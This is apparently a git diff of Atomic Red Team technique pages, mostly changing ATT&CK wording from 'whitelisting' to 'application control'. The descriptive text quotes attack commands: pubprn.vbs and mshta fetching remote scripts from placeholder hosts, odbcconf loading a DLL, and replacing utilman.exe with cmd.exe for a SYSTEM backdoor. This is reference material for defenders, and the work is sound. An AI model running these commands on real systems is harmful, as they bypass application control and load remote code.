-Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
+Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md
index 8ff7b691..de1597eb 100644
--- a/atomics/T1216.001/T1216.001.md
+++ b/atomics/T1216.001/T1216.001.md
@@ -1,6 +1,6 @@
# T1216.001 - PubPrn
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216.001)
-Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
+Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index 65197469..c2802d6b 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -1,6 +1,6 @@
# T1216 - Signed Script Proxy Execution
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
-Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)
+Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)
## Atomic Tests
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index 7ad2b997..975f9ef4 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.001)
Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
-A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
+A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
## Atomic Tests
diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md
index 91111ef3..1598a763 100644
--- a/atomics/T1218.002/T1218.002.md
+++ b/atomics/T1218.002/T1218.002.md
@@ -4,7 +4,7 @@
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
-Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
+Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
## Atomic Tests
diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md
index c748de8d..41e8b4de 100644
--- a/atomics/T1218.003/T1218.003.md
+++ b/atomics/T1218.003/T1218.003.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.003)
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
-Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
+Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md
index 28729027..fb959189 100644
--- a/atomics/T1218.004/T1218.004.md
+++ b/atomics/T1218.004/T1218.004.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.004)
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe.
-InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
+InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
## Atomic Tests
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 595eca96..bddf999c 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -8,7 +8,7 @@ Files may be executed by mshta.exe through an inline script: mshta vbscrip
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
-Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
+Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
## Atomic Tests
diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md
index 3084b7a2..e0e53a4e 100644
--- a/atomics/T1218.007/T1218.007.md
+++ b/atomics/T1218.007/T1218.007.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.007)
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
-Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application whitelisting solutions that do not account for its potential abuse.
+Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.
## Atomic Tests
diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md
index 960ceec5..fcba19fd 100644
--- a/atomics/T1218.008/T1218.008.md
+++ b/atomics/T1218.008/T1218.008.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.008)
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.
-Adversaries may abuse odbcconf.exe to bypass application whitelisting solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
+Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
## Atomic Tests
diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md
index 0e124988..1ab15341 100644
--- a/atomics/T1218.009/T1218.009.md
+++ b/atomics/T1218.009/T1218.009.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.009)
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
-Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
+Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
## Atomic Tests
diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md
index 989108d2..9597db5f 100644
--- a/atomics/T1218.010/T1218.010.md
+++ b/atomics/T1218.010/T1218.010.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.010)
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
-Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
+Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 63cbed95..a87dd10d 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -1,6 +1,6 @@
# T1218.011 - Rundll32
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.011)
-Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
+Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
index 7de1fc92..52b4a0b2 100644
--- a/atomics/T1219/T1219.md
+++ b/atomics/T1219/T1219.md
@@ -1,6 +1,6 @@
# T1219 - Remote Access Software
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1219)
-An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md
index a162852d..50846cf5 100644
--- a/atomics/T1220/T1220.md
+++ b/atomics/T1220/T1220.md
@@ -1,8 +1,8 @@
# T1220 - XSL Script Processing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1220)
-Adversaries may bypass application whitelisting and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
+Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
-Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
+Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md
index f008a7da..6be8beac 100644
--- a/atomics/T1518.001/T1518.001.md
+++ b/atomics/T1518.001/T1518.001.md
@@ -1,8 +1,10 @@
# T1518.001 - Security Software Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1518.001)
-Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
+Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
+
+Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)
## Atomic Tests
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index add53f45..5d182349 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -1,6 +1,6 @@
# T1518 - Software Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1518)
-Adversaries may attempt to get a listing of software and software versions that are installed on a system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md
index 6ba493cc..89c7dfea 100644
--- a/atomics/T1546.003/T1546.003.md
+++ b/atomics/T1546.003/T1546.003.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1546.003)
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
-Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
+Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md
index 9b33f1f7..46b2bf64 100644
--- a/atomics/T1546.008/T1546.008.md
+++ b/atomics/T1546.008/T1546.008.md
@@ -8,7 +8,7 @@ Depending on the version of Windows, an adversary may take advantage of these fe
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
-Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
+Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md
index 28b6c1cb..789da6ec 100644
--- a/atomics/T1546.011/T1546.011.md
+++ b/atomics/T1546.011/T1546.011.md
@@ -16,7 +16,7 @@ Custom databases are stored in:
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
-Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. Shims can also be abused to establish persistence by continuously being invoked by affected programs.
+Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.
## Atomic Tests
diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md
index 987bc647..57071d6c 100644
--- a/atomics/T1547.004/T1547.004.md
+++ b/atomics/T1547.004/T1547.004.md
@@ -1,7 +1,6 @@
# T1547.004 - Winlogon Helper DLL
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1547.004)
-
-Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
+Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md
index b1243370..c4c93bb2 100644
--- a/atomics/T1547.006/T1547.006.md
+++ b/atomics/T1547.006/T1547.006.md
@@ -6,7 +6,7 @@ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attac
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.
-Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)
+Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
## Atomic Tests
diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md
index 9a351a21..86e80123 100644
--- a/atomics/T1564.003/T1564.003.md
+++ b/atomics/T1564.003/T1564.003.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1564.003)
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
-On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [VBScript](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)
